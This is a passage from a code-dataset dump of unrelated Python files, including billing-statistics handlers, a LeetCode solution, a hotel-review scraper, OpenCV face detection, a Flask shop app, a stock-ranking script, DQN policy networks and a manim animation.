product_id:\n _query = _query.filter(models.TrCustomerOrder.product_id == product_id)\n if operator_name:\n _query = _query.filter(models.TrAcceptLog.operator_name == operator_name)\n if query_begin_time:\n _query = _query.filter(models.TrCustomerOrder.stat_month >= query_begin_time)\n if query_end_time:\n _query = _query.filter(models.TrCustomerOrder.stat_month <= query_end_time)\n 
_query = _query.group_by('stat_month', 'node_id', 'node_name', 'product_id', 'product_name', 'operator_name')\n _query = _query.order_by('stat_month')\n userqry = _query.subquery()\n fee_total = self.db.query(func.sum(userqry.c.actual_fee)).scalar() or 0\n dev_total = self.db.query(func.sum(userqry.c.dev_count)).scalar() or 0\n if self.request.path == '/admin/stat/income/month':\n return self.render('income_month_stat.html', node_list=opr_nodes, fee_total=fee_total, dev_total=dev_total, products=opr_products, statitems=_query.limit(5000), **self.get_params())\n elif self.request.path == '/admin/stat/income/month/export':\n data = Dataset()\n data.append((u'月份', u'区域', u'资费', u'操作员', u'受理用户数', u'总金额'))\n _f2y = utils.fen2yuan\n for i in _query:\n data.append((i.stat_month,\n i.node_name,\n i.product_name,\n i.operator_name,\n i.dev_count,\n _f2y(i.actual_fee)))\n\n name = u'RADIUS-INCOME-MONTH-' + datetime.datetime.now().strftime('%Y%m%d-%H%M%S') + '.xls'\n return self.export_file(name, data)\n else:\n return\n\n\n@permit.suproute('/admin/stat/income/month/export', u'营业月统计导出', MenuStat, order=1.10001)\n\nclass IncomeMonthStatExportHandler(IncomeMonthStatHandler):\n pass\n\n\n@permit.suproute('/admin/stat/income/trend/month', u'运营分析-营收月趋势', MenuStat, order=5.0001)\n\nclass IncomeMonthTrendHandler(BaseHandler):\n\n @authenticated\n def get(self):\n pay_status = self.get_argument('pay_status', None)\n accept_type = self.get_argument('accept_type', None)\n stat_month = self.get_argument('stat_month', utils.get_currdate()[0:7])\n _query = self.db.query(models.TrCustomerOrder.stat_day, func.sum(models.TrCustomerOrder.actual_fee).label('fee_value'), func.count(models.TrCustomerOrder.order_id).label('dev_count')).filter(models.TrCustomer.customer_id == models.TrCustomerOrder.customer_id, models.TrCustomerOrder.stat_month == stat_month, models.TrAcceptLog.id == models.TrCustomerOrder.accept_id)\n if pay_status:\n _query = _query.filter(models.TrCustomerOrder.pay_status == int(pay_status))\n if accept_type:\n _query = _query.filter(models.TrAcceptLog.accept_type == accept_type)\n _query = _query.group_by(models.TrCustomerOrder.stat_day)\n _query = _query.order_by(models.TrCustomerOrder.stat_day.asc())\n userqry = _query.subquery()\n fee_total = self.db.query(func.sum(userqry.c.fee_value)).scalar() or 0\n dev_total = self.db.query(func.sum(userqry.c.dev_count)).scalar() or 0\n fee_data = [ (i.stat_day, float(utils.fen2yuan(i.fee_value))) for i in _query ]\n dev_data = [ (i.stat_day, float(i.dev_count)) for i in _query ]\n categories = [ i.stat_day for i in _query ]\n self.render_json(code=0, msg='ok', fee_data=fee_data, dev_data=dev_data, categories=categories, dev_total=int(dev_total), fee_total=utils.fen2yuan(fee_total))\n return\n\n\n@permit.suproute('/admin/stat/income/noderate/month', u'运营分析-区域营收比例(月)', MenuStat, order=5.0002)\n\nclass IncomeMonthNoderateHandler(BaseHandler):\n\n @authenticated\n def get(self):\n pay_status = self.get_argument('pay_status', None)\n accept_type = self.get_argument('accept_type', None)\n stat_month = self.get_argument('stat_month', utils.get_currdate()[0:7])\n _query = self.db.query(models.TrNode.node_name, func.sum(models.TrCustomerOrder.actual_fee).label('fee_value'), func.count(models.TrCustomerOrder.order_id).label('dev_count')).filter(models.TrCustomer.customer_id == models.TrCustomerOrder.customer_id, models.TrNode.id == models.TrCustomer.node_id, models.TrCustomerOrder.stat_month == stat_month)\n if pay_status:\n _query = 
_query.filter(models.TrCustomerOrder.pay_status == int(pay_status))\n if accept_type:\n _query = _query.filter(models.TrAcceptLog.accept_type == accept_type)\n _query = _query.group_by(models.TrNode.node_name)\n _query = _query.order_by(models.TrNode.node_name.asc())\n userqry = _query.subquery()\n fee_total = self.db.query(func.sum(userqry.c.fee_value)).scalar() or 0\n dev_total = self.db.query(func.sum(userqry.c.dev_count)).scalar() or 0\n fee_data = [ {'name': i.node_name,\n 'y': float(utils.fen2yuan(i.fee_value))} for i in _query ]\n dev_data = [ {'name': i.node_name,\n 'y': float(i.dev_count)} for i in _query ]\n self.render_json(code=0, msg='ok', fee_data=fee_data, dev_data=dev_data, dev_total=int(dev_total), fee_total=utils.fen2yuan(fee_total))\n return\n\n\n@permit.suproute('/admin/stat/income/productrate/month', u'运营分析-资费营收比例(月)', MenuStat, order=5.0002)\n\nclass IncomeMonthProductRateHandler(BaseHandler):\n\n @authenticated\n def get(self):\n pay_status = self.get_argument('pay_status', None)\n accept_type = self.get_argument('accept_type', None)\n stat_month = self.get_argument('stat_month', utils.get_currdate()[0:7])\n _query = self.db.query(models.TrProduct.product_name, func.sum(models.TrCustomerOrder.actual_fee).label('fee_value'), func.count(models.TrCustomerOrder.order_id).label('dev_count')).filter(models.TrCustomer.customer_id == models.TrCustomerOrder.customer_id, models.TrProduct.id == models.TrCustomerOrder.product_id, models.TrCustomerOrder.stat_month == stat_month)\n if pay_status:\n _query = _query.filter(models.TrCustomerOrder.pay_status == int(pay_status))\n if accept_type:\n _query = _query.filter(models.TrAcceptLog.accept_type == accept_type)\n _query = _query.group_by(models.TrProduct.product_name)\n _query = _query.order_by(models.TrProduct.product_name.asc())\n userqry = _query.subquery()\n fee_total = self.db.query(func.sum(userqry.c.fee_value)).scalar() or 0\n dev_total = self.db.query(func.sum(userqry.c.dev_count)).scalar() or 0\n fee_data = [ {'name': i.product_name,\n 'y': float(utils.fen2yuan(i.fee_value))} for i in _query ]\n dev_data = [ {'name': i.product_name,\n 'y': float(i.dev_count)} for i in _query ]\n self.render_json(code=0, msg='ok', fee_data=fee_data, dev_data=dev_data, dev_total=int(dev_total), fee_total=utils.fen2yuan(fee_total))\n return\n\n@permit.suproute('/admin/stat/income/oprrate/month', u'运营分析-操作员营收比例(月)', MenuStat, order=5.0003)\n\nclass IncomeMonthOprRateHandler(BaseHandler):\n\n @authenticated\n def get(self):\n pay_status = self.get_argument('pay_status', None)\n accept_type = self.get_argument('accept_type', None)\n stat_month = self.get_argument('stat_month', utils.get_currdate()[0:7])\n _query = self.db.query(models.TrAcceptLog.operator_name, func.sum(models.TrCustomerOrder.actual_fee).label('fee_value'), func.count(models.TrCustomerOrder.order_id).label('dev_count')).filter(models.TrCustomer.customer_id == models.TrCustomerOrder.customer_id, models.TrAcceptLog.id == models.TrCustomerOrder.accept_id, models.TrCustomerOrder.stat_month == stat_month)\n if pay_status:\n _query = _query.filter(models.TrCustomerOrder.pay_status == int(pay_status))\n if accept_type:\n _query = _query.filter(models.TrAcceptLog.accept_type == accept_type)\n _query = _query.group_by(models.TrAcceptLog.operator_name)\n _query = _query.order_by(models.TrAcceptLog.operator_name.asc())\n userqry = _query.subquery()\n fee_total = self.db.query(func.sum(userqry.c.fee_value)).scalar() or 0\n dev_total = self.db.query(func.sum(userqry.c.dev_count)).scalar() 
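# On the income_month.py handlers above: each one aggregates with
# func.sum/func.count plus group_by, then re-aggregates the subquery for the
# grand totals. The same pattern in miniature against an in-memory SQLite
# model (all names invented; this uses SQLAlchemy 1.4+ imports, unlike the
# older style of the record itself):
from sqlalchemy import Column, Integer, String, create_engine, func
from sqlalchemy.orm import Session, declarative_base

Base = declarative_base()

class Order(Base):
    __tablename__ = 'orders'
    id = Column(Integer, primary_key=True)
    month = Column(String)
    fee = Column(Integer)

engine = create_engine('sqlite://')
Base.metadata.create_all(engine)
with Session(engine) as session:
    session.add_all([Order(month='2024-01', fee=100),
                     Order(month='2024-01', fee=50)])
    session.commit()
    # per-dimension aggregate, mirroring the handlers' group_by step
    per_month = (session.query(Order.month, func.sum(Order.fee).label('fee'))
                 .group_by(Order.month)).subquery()
    # grand total over the subquery, mirroring the fee_total/dev_total step
    total = session.query(func.sum(per_month.c.fee)).scalar() or 0
    assert total == 150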
or 0\n fee_data = [ {'name': i.operator_name,\n 'y': float(utils.fen2yuan(i.fee_value))} for i in _query ]\n dev_data = [ {'name': i.operator_name,\n 'y': float(i.dev_count)} for i in _query ]\n self.render_json(code=0, msg='ok', fee_data=fee_data, dev_data=dev_data, dev_total=int(dev_total), fee_total=utils.fen2yuan(fee_total))\n return","sub_path":"taurusxradius/modules/busstat/income_month.py","file_name":"income_month.py","file_ext":"py","file_size_in_byte":10907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"316286498","text":"'''\nTime: O(M + N)\nSpace: O(1)\n\nYou are here!\nYour runtime beats 13.55 % of python submissions.\nYou are here!\nYour memory usage beats 44.46 % of python submissions.\n'''\n\n\nclass Solution(object):\n def merge(self, nums1, m, nums2, n):\n \"\"\"\n :type nums1: List[int]\n :type m: int\n :type nums2: List[int]\n :type n: int\n :rtype: None Do not return anything, modify nums1 in-place instead.\n \"\"\"\n # process from end directly\n i, j = m - 1, n - 1\n idx = m + n - 1\n while i >= 0 and j >= 0:\n if nums1[i] > nums2[j]:\n nums1[idx] = nums1[i]\n i -= 1\n else:\n nums1[idx] = nums2[j]\n j -= 1\n idx -= 1\n \n # if j not reach 0\n # if j >= 0:\n # nums1[: j + 1] = nums2[ : j + 1]\n while j >= 0:\n nums1[j] = nums2[j]\n j -= 1","sub_path":"explore/2021/january/Merge_Sorted_Array.2.py","file_name":"Merge_Sorted_Array.2.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"153209379","text":"from selenium import webdriver\nfrom lxml import etree\nimport time\nimport re\nfrom bs4 import BeautifulSoup\nimport json\nclass_name = ['dt-color8 dt-fn12', 'm110' ,'dt-color3', 'dt-color8']\n# 根据css文件的类名来生成不同xml字段,因为每次加载出来的网页中评论总数的位置有所变化\ndef get_hotel_commnet_url(hotel_url): # get_hotel_comment_url 获取该酒店的评论地址\n hotel_id_re=re.compile('.*/(\\d+).html')\n id = None\n for x in hotel_id_re.findall(hotel_url):\n id = x\n break\n if id is not None:\n return 'http://m.ctrip.com/webapp/hotel/hoteldetail/dianping/'+id+'.html?roomtype=&opr=&fr=detail&daylater=0&days=1&treename='\ndef get_commnet_num_xml(num): #根据输入的num尝试生成 获取该酒店的评论总数 的xpath\n xslt_root = etree.XML(\"\"\"\\\n <xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" >\n <xsl:template match=\"/\">\n <comment>\n <xsl:apply-templates select=\"//*[@class='\"\"\" + class_name[num] + \"\"\"']\" mode=\"comment\"/>\n </comment>\n </xsl:template>\n <xsl:template match=\"//*[@class='\"\"\" + class_name[num] + \"\"\"']\" mode=\"comment\">\n <item>\n <num>\n <xsl:value-of select=\".\"/>\n </num>\n </item>\n </xsl:template>\n </xsl:stylesheet>\"\"\")\n return xslt_root\n# 获取评论总数\ndef get_commnet_num(hotel_url):\n driver = webdriver.Chrome(executable_path='C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chromedriver.exe')\n driver.get(url=hotel_url)\n time.sleep(20)\n html = driver.execute_script(\"return document.documentElement.outerHTML\")\n num_re=re.compile('(\\d+)条[评论|点评]{0,1}')\n count=0\n for i in range(0, len(class_name)):\n xslt_root = get_commnet_num_xml(i)\n transfrom = etree.XSLT(xslt_root)\n doc = etree.HTML(html)\n result_tree = transfrom(doc)\n for x in num_re.findall(str(result_tree)):\n if x is not None:\n count = x\n break\n driver.close()\n return count\n# 获取所有评论,先获取评论总数,再根据评论总数决定下滑次数,将所有评论加载出来,再解析所有评论\ndef get_all_comment(hotel_comment_url, comment_count ,output_file):\n driver = 
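# On Merge_Sorted_Array.2.py above: filling nums1 from the back is what makes
# the O(1)-space merge safe, since no unread element of nums1 is overwritten
# before it is consumed. A quick check of that in-place behaviour (assumes
# the Solution class from that record is in scope):
nums1 = [1, 3, 5, 0, 0, 0]
Solution().merge(nums1, 3, [2, 4, 6], 3)
assert nums1 == [1, 2, 3, 4, 5, 6]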
webdriver.Chrome(executable_path='C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chromedriver.exe')\n xslt_root=etree.XML(\"\"\"\\\n <xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" >\n <xsl:template match=\"/\">\n <comment>\n <xsl:apply-templates select=\"//*[@class='dn hotel-t-b-border']\" mode=\"comment\"/>\n </comment>\n </xsl:template>\n <xsl:template match=\"//*[@class='dn hotel-t-b-border']\" mode=\"comment\">\n <item>\n <information>\n <xsl:copy-of select=\".\"/>\n </information>\n </item>\n </xsl:template>\n </xsl:stylesheet>\n \"\"\")\n driver.get(url=hotel_comment_url)\n time.sleep(10)\n for i in range(0,int(int(comment_count)/10+10)):\n driver.execute_script(\"scrollBy(0,3000)\")\n time.sleep(1)\n html = driver.execute_script(\"return document.documentElement.outerHTML\")\n transfrom = etree.XSLT(xslt_root)\n doc = etree.HTML(html)\n result_tree = transfrom(doc)\n bs4Oj = BeautifulSoup(str(result_tree),\"lxml\")\n list=bs4Oj.find_all(\"div\",{\"class\" : \"dn hotel-t-b-border\"})\n comment_detail_re=re.compile('.*?<strong itemprop=\"ratingValue\">(.*?)</strong>.*?<div class=\"hotel-cell-num\"><p><span class=\"fr hotel-arr.*?>(.*?)</span>(.*?)</p>.*?<em class=\"item .*?>(.*?)</em>.*?<span class=\"user-level-base.*?\">(.*?)</span>.*?<time itemprop=\"datePublished\">(.*?)</time>.*?<p class=\"tree-ellips-line6.*?>(.*?)</p>')\n for x in list:\n x = str(x).replace('\\n', '')\n for y in comment_detail_re.findall(x):\n d ={'score': y[0], 'room_type': y[1], 'name': y[2], 'tour_type': y[3], 'grade': y[4], 'time': y[5], 'comment': y[6]}\n output_file.write(str(d)+'\\n')\n driver.close()\ndef test():\n line = '{\"url\": \"http://m.ctrip.com/html5/hotel/hoteldetail/433114.html\", \"title\": \"北京和平里宾馆\"}'\n json_data = json.loads(line)\n output_file = open(\"hotel_commet.txt\", \"w\", encoding='utf-8')\n hotel_url = json_data['url']\n hotel_comment_url = get_hotel_commnet_url(hotel_url)\n comment_count = get_commnet_num(hotel_url)\n print(comment_count)\n # print('评论地址:' + hotel_comment_url + \",评论总数:\" + str(comment_count))\n output_file.write('酒店名称:'+str(json_data['title'])+\",酒店地址:\"+str(json_data['url'])+\",酒店评论总数:\"+str(comment_count)+\"\\n\")\n get_all_comment(hotel_comment_url, 10 ,output_file)\n output_file.close()\n","sub_path":"a_hotel_get_comment.py","file_name":"a_hotel_get_comment.py","file_ext":"py","file_size_in_byte":4735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"372641818","text":"import numpy as np\nimport cv2\n\n\ndef main():\n # show_camera_image()\n # find_face_on_image()\n extract_face_from_camera()\n\n\ndef show_camera_image():\n cap = cv2.VideoCapture(0)\n\n while (True):\n # Capture frame-by-frame\n ret, frame = cap.read()\n\n # Our operations on the frame come here\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # Display the resulting frame\n cv2.imshow('frame', gray)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n # When everything done, release the capture\n cap.release()\n cv2.destroyAllWindows()\n\n\n'''\n Use cascadeClassifier to extract face, find more details in:\n https://docs.opencv.org/3.3.0/d7/d8b/tutorial_py_face_detection.html\n'''\n\n\ndef find_face_on_image():\n # cap = cv2.VideoCapture(0)\n # ret, img = cap.read()\n # img = cv2.imread('resources/face_demo.jpg')\n img = cv2.imread('resources/full_body_zh1.jpg')\n face_cascade = cv2.CascadeClassifier(\n 
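# On a_hotel_get_comment.py above: get_all_comment scrolls a fixed number of
# times derived from the comment count. An alternative (an untested sketch,
# not what the scraper does; pause and max_rounds are guesses) is to scroll
# until the page height stops growing, which adapts to whatever loads:
import time

def scroll_until_stable(driver, pause=1.0, max_rounds=200):
    last_height = driver.execute_script('return document.body.scrollHeight')
    for _ in range(max_rounds):
        driver.execute_script('window.scrollTo(0, document.body.scrollHeight)')
        time.sleep(pause)
        height = driver.execute_script('return document.body.scrollHeight')
        if height == last_height:
            break  # nothing new was loaded on this round
        last_height = height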
'/usr/local/Cellar/opencv/3.4.0_1/share/OpenCV/haarcascades/haarcascade_frontalface_default.xml')\n eye_cascade = cv2.CascadeClassifier(\n '/usr/local/Cellar/opencv/3.4.0_1/share/OpenCV/haarcascades/haarcascade_eye.xml')\n\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n for (x, y, w, h) in faces:\n cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 2)\n roi_gray = gray[y:y + h, x:x + w]\n roi_color = img[y:y + h, x:x + w]\n eyes = eye_cascade.detectMultiScale(roi_gray)\n for (ex, ey, ew, eh) in eyes:\n cv2.rectangle(roi_color, (ex, ey), (ex + ew, ey + eh), (0, 255, 0), 2)\n cv2.imshow('img', img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\ndef extract_face_from_camera():\n cap = cv2.VideoCapture(0)\n while (True):\n ret, frame = cap.read()\n\n face_cascade = cv2.CascadeClassifier(\n '/usr/local/Cellar/opencv/3.4.0_1/share/OpenCV/haarcascades/haarcascade_frontalface_default.xml')\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n face_images = [];\n for (x, y, w, h) in faces:\n face_images.append(frame[y:y + h, x:x + w]);\n\n for i in range(len(face_images)):\n cv2.imwrite('tmp/test{}.jpg'.format(i), face_images[i])\n\n cv2.imshow('frame', frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"demos/camera_reader_demo.py","file_name":"camera_reader_demo.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"304259425","text":"from flask import Flask, render_template, redirect\r\nfrom flask.helpers import url_for\r\nfrom forms import *\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom flask_bootstrap import Bootstrap\r\nfrom flask_moment import Moment\r\nfrom flask_login import LoginManager, current_user, login_required\r\nfrom werkzeug.utils import secure_filename\r\nimport os\r\nimport uuid\r\nfrom models import db,user,posts,items\r\nfrom sqlalchemy.exc import SQLAlchemyError\r\n\r\n\r\n\r\nIMAGE_UPLOAD_FOLDER = '/static/img'\r\nEXTENSIONS = set(['jpg', 'jpeg'])\r\n\r\napp = Flask(__name__)\r\napplication = app\r\napp.config['SECRET_KEY'] = 'hard to guess string'\r\napp.config['SQLALCHEMY_DATABASE_URI'] ='sqlite:///posts.db'\r\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\r\ndb.init_app(app)\r\n\r\n\r\nfrom auth import auth as auth_blueprint\r\napp.register_blueprint(auth_blueprint)\r\n\r\nbootstrap = Bootstrap(app)\r\nmoment = Moment(app)\r\nlogin_manager = LoginManager()\r\nlogin_manager.login_view = 'auth.login'\r\nlogin_manager.init_app(app)\r\nwith app.app_context():\r\n db.create_all()\r\n\r\n@login_manager.user_loader\r\ndef load_user(user_id):\r\n return user.query.get(int(user_id))\r\n\r\n@app.route('/update/<int:id>', methods=['GET', 'POST'])\r\ndef update(id):\r\n old_post = posts.query.get(id)\r\n update_form = UpdateForm(title=old_post.title, body=old_post.body,price=old_post.price,pic=old_post.pic)\r\n \r\n if update_form.validate_on_submit():\r\n\r\n old = posts.query.get_or_404(id)\r\n old.title = update_form.title.data\r\n old.body = update_form.body.data\r\n old.price = update_form.price.data\r\n pic = update_form.pic.data\r\n uuid_filename = str(uuid.uuid4())\r\n pic.save(os.path.join(\r\n app.root_path, 'static/img', uuid_filename\r\n ))\r\n old.pic = uuid_filename\r\n print(update_form.title.data)\r\n print(update_form.body.data)\r\n print(update_form.price.data)\r\n print(uuid_filename)\r\n\r\n 
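# On camera_reader_demo.py above: the hard-coded Homebrew cascade paths break
# on any other machine. The pip opencv-python wheels ship the cascade files
# and expose their directory as cv2.data.haarcascades, so a more portable
# construction (assuming such a build) is:
import os
import cv2

face_cascade = cv2.CascadeClassifier(
    os.path.join(cv2.data.haarcascades, 'haarcascade_frontalface_default.xml'))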
try:\r\n db.session.commit()\r\n return redirect(url_for('index'))\r\n except:\r\n return \"Update error\"\r\n return render_template('update.html', update_form=update_form )\r\n\r\n@app.route('/add_to_cart/<int:id>', methods=['GET'])\r\ndef add_to_cart(id):\r\n already_in = items.query.filter_by(post_id=id).all()\r\n if already_in:\r\n return redirect(url_for('index'))\r\n db_entry = items(post_id=id,email=current_user.email)\r\n print(db_entry)\r\n try:\r\n db.session.add(db_entry)\r\n db.session.commit()\r\n return redirect(url_for('index'))\r\n\r\n except SQLAlchemyError as e:\r\n error = str(e.__dict__['orig'])\r\n return error\r\n\r\n\r\n@app.route('/delete_from_cart/<int:id>', methods=['GET'])\r\ndef delete_from_cart(id):\r\n deleted_post = items.query.filter_by(post_id=id).first()\r\n try:\r\n db.session.delete(deleted_post)\r\n db.session.commit()\r\n return redirect(url_for('index'))\r\n except SQLAlchemyError as e:\r\n error = str(e.__dict__['orig'])\r\n return error\r\n\r\ndef cart_list():\r\n return items.query.filter_by(email=current_user.email).all()\r\n\r\n\r\n@app.route('/delete/<int:id>', methods=['GET', 'POST'])\r\ndef delete(id):\r\n\r\n deleted_post = posts.query.get_or_404(id)\r\n in_cart = items.query.filter_by(post_id=id).first()\r\n if in_cart:\r\n try:\r\n db.session.delete(in_cart)\r\n except:\r\n return \"Delete error\"\r\n try:\r\n db.session.delete(deleted_post)\r\n db.session.commit()\r\n return redirect(url_for('index'))\r\n except:\r\n return \"Delete error\"\r\n\r\n@app.route('/', methods=['GET', 'POST'])\r\ndef index():\r\n if not current_user.is_authenticated:\r\n return render_template(\"home.html\")\r\n\r\n title = body = price = pic = None\r\n post_form = PostForm()\r\n if post_form.validate_on_submit():\r\n title = post_form.title.data\r\n body = post_form.body.data\r\n price = post_form.price.data\r\n pic = post_form.pic.data\r\n uuid_filename = str(uuid.uuid4())\r\n pic.save(os.path.join(\r\n app.root_path, 'static/img', uuid_filename\r\n ))\r\n \r\n db_entry = posts(title = title, body = body, price = price, pic = uuid_filename, author_username=current_user.username, author_email=current_user.email)\r\n try:\r\n db.session.add(db_entry)\r\n db.session.commit()\r\n except:\r\n return \"Database error\"\r\n else :\r\n print(post_form.errors)\r\n items_list = [item.post_id for item in cart_list()]\r\n return render_template('index.html', post_form=post_form , posts_table=posts.query.order_by(posts.id.desc()).all(), current_user=current_user,cart_list =items_list, len_cart_list = len(items_list) )\r\n\r\n\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"517029086","text":"# -*- coding: utf-8 -*-\nimport pandas as pd\n\n\n\ndef magic_by_pd(path_per, path_roa):\n # 파일경로\n file_path_per = path_per\n\n # 파일읽기\n # per_data = pd.read_excel(file_path, sheet_name='PER', index_col=0)\n per_data = pd.read_csv(file_path_per, sep='\\t', index_col=0)\n\n # 필터링\n filtered_per = per_data[per_data['PER'] > 0]\n\n # 정렬\n sorted_per = filtered_per.sort_values(by='PER')\n\n # 랭킹\n sorted_per['PER랭킹'] = sorted_per['PER'].rank()\n\n # sorted_per\n \n # 파일경로\n file_path_roa = path_roa\n\n # 파일읽기\n roa_data = pd.read_csv(file_path_roa, sep='\\t', index_col=0)\n\n # 필터링\n filtered_roa = roa_data.dropna()\n filtered_roa.columns = ['ROA']\n\n # 정렬\n sorted_roa = filtered_roa.sort_values(by='ROA', ascending=False)\n\n # 랭킹\n 
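# On app.py above: uploads are saved under a bare str(uuid.uuid4()), which
# drops the file extension. A small variant that keeps a sanitised extension;
# a sketch reusing imports the app already has (os, uuid, secure_filename),
# with an invented helper name:
def unique_upload_name(file_storage):
    ext = os.path.splitext(secure_filename(file_storage.filename))[1]
    return str(uuid.uuid4()) + ext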
sorted_roa['ROA랭킹'] = sorted_roa['ROA'].rank(ascending=False)\n\n # sorted_roa\n \n # 병합\n total_df = pd.merge(sorted_per, sorted_roa, how='inner', left_index=True, right_index=True)\n\n total_df['랭킹 합계'] = total_df['PER랭킹'] + total_df['ROA랭킹']\n\n sorted_df = total_df.sort_values(by='랭킹 합계')\n\n sorted_df['종합 랭크'] = sorted_df['랭킹 합계'].rank()\n\n # sorted_df\n \n return sorted_df\n","sub_path":"MagicQuant.py","file_name":"MagicQuant.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"426400074","text":"import tensorflow as tf\nfrom tensorflow.python.keras import Sequential\nfrom tensorflow.python.keras.engine import Layer\nfrom tensorflow.python.keras.layers import Dense, Conv2D, Flatten\n\n\nclass CNNFeatures(Sequential):\n def __init__(self):\n \"\"\"\n 'Human-level control through deep reinforcement learning':\n The first hidden layer convolves 32 filters of 8 x 8 with stride 4 with the input image and applies a rectifier nonlinearity.\n The second hidden layer convolves 64 filters of 4 x 4 with stride 2, again followed by a rectifier nonlinearity.\n This is followed by a third convolutional layer that convolves 64 filters of 3 x 3 with stride 1 followed by a rectifier.\n The final hidden layer is fully-connected and consists of 512 rectifier units.\n The output layer is a fully-connected linear layer with a single output for each valid action.\n \"\"\"\n layers = [\n CheckCNNObsNormalized(),\n Conv2D(filters=32, kernel_size=8, strides=4, activation='relu'),\n Conv2D(filters=64, kernel_size=4, strides=2, activation='relu'),\n Conv2D(filters=64, kernel_size=3, strides=1, activation='relu'),\n Flatten(),\n Dense(units=512, activation='relu')\n ]\n super().__init__(layers)\n\n\nclass CheckCNNObsNormalized(Layer):\n def call(self, obs, **kwargs):\n assert obs.shape.as_list() == [None, 84, 84, 4]\n asserts = [tf.assert_greater_equal(obs, 0.0), tf.assert_less_equal(obs, 1.0)]\n with tf.control_dependencies(asserts):\n obs = tf.identity(obs)\n return obs\n\n\nclass MLPFeatures(Sequential):\n def __init__(self):\n layers = [\n Dense(64, 'relu'),\n Dense(64, 'relu'),\n ]\n super().__init__(layers)\n\n\nclass Policy(Sequential):\n def __init__(self, n_actions, features_cls, dueling):\n features_model = features_cls()\n if dueling:\n layers = [\n features_model,\n DuelingQs(n_actions)\n ]\n else:\n layers = [\n features_model,\n Dense(n_actions, activation=None)\n ]\n super().__init__(layers)\n\n\nclass DuelingQs(Layer):\n def __init__(self, n_actions):\n super().__init__()\n self.n_actions = n_actions\n self.v_layer = Dense(1, activation=None)\n self.advs_layer = Dense(n_actions, activation=None)\n\n def call(self, features, **kwargs):\n v = self.v_layer(features)\n advs = self.advs_layer(features)\n\n assert v.shape.as_list() == [None, 1]\n assert advs.shape.as_list() == [None, self.n_actions]\n\n mean_adv = tf.reduce_mean(advs, axis=1, keepdims=True)\n centered_advs = advs - mean_adv\n qs = v + centered_advs\n\n assert mean_adv.shape.as_list() == [None, 1]\n assert centered_advs.shape.as_list() == [None, self.n_actions]\n assert qs.shape.as_list() == [None, self.n_actions]\n\n return qs\n","sub_path":"dqn/policies.py","file_name":"policies.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"139314237","text":"from manimlib.imports import *\nimport numpy as np\nimport torch\nimport torch.nn as 
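# On the dqn/policies.py record above: DuelingQs subtracts the mean advantage
# before adding V, the usual identifiability trick from the dueling-DQN
# architecture - the centred advantages sum to zero per state, so V alone
# carries the common value. A NumPy check of that identity:
import numpy as np

v = np.array([[2.0]])                # state value, batch of 1
advs = np.array([[1.0, -0.5, 3.0]])  # raw advantages for 3 actions
qs = v + (advs - advs.mean(axis=1, keepdims=True))
assert abs(float((qs - v).sum())) < 1e-9  # centred advantages sum to zero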
nn\nimport torch.nn.functional as F\nimport matplotlib.pyplot as plt\n\n\nclass Model(nn.Module):\n def __init__(self, D_in: int, H: int, D_out: int) -> None:\n super().__init__()\n self.H = H\n self.linear1 = torch.nn.Linear(D_in, H)\n self.linear2 = torch.nn.Linear(H, D_out)\n\n def forward(self, x, nb_relu_dim=-1):\n z = self.linear1(x)\n if nb_relu_dim == self.H or nb_relu_dim == -1:\n h = F.relu(z)\n elif nb_relu_dim == 0:\n h = z\n else:\n # torch.cat expects a sequence of tensors\n h = torch.cat((F.relu(z[:nb_relu_dim]), z[nb_relu_dim:]))\n return self.linear2(h), h, z\n\n\ntorch.manual_seed(8)\nmodel = Model(2, 1, 2)\n\n\ndef rgb2hex(r, g, b):\n r, g, b = int(r * 255), int(g * 255), int(b * 255)\n return \"#{:02x}{:02x}{:02x}\".format(r, g, b)\n\n\nzieger = plt.imread('ziegler.png')\n\nX = torch.randn(1000, 2)\nH = torch.tanh(X)\n\nx_min = -1\nx_max = +1\ncolors = (X - x_min) / (x_max - x_min)\ncolors = (colors * 511).short().numpy()\ncolors = np.clip(colors, 0, 511)\n\ncolors = zieger[colors[:, 0], colors[:, 1]]\n\n\nclass RandomTransform(LinearTransformationScene):\n CONFIG = {\n \"show_basis_vectors\": False,\n \"foreground_plane_kwargs\": {\n \"x_line_frequency\": 1,\n \"y_line_frequency\": 1,\n },\n \"relu\": False\n }\n\n def construct(self):\n points = VGroup(*[\n Dot(2*np.array([point[0], point[1], 0]), color=rgb2hex(*colors[index]),\n radius=0.75*DEFAULT_DOT_RADIUS) for index, point in enumerate(H)\n ])\n self.setup()\n self.play(Write(points))\n self.wait()\n\n self.moving_mobjects += [*points]\n\n self.apply_nonlinear_transformation(self.func, run_time=6)\n self.wait()\n\n if 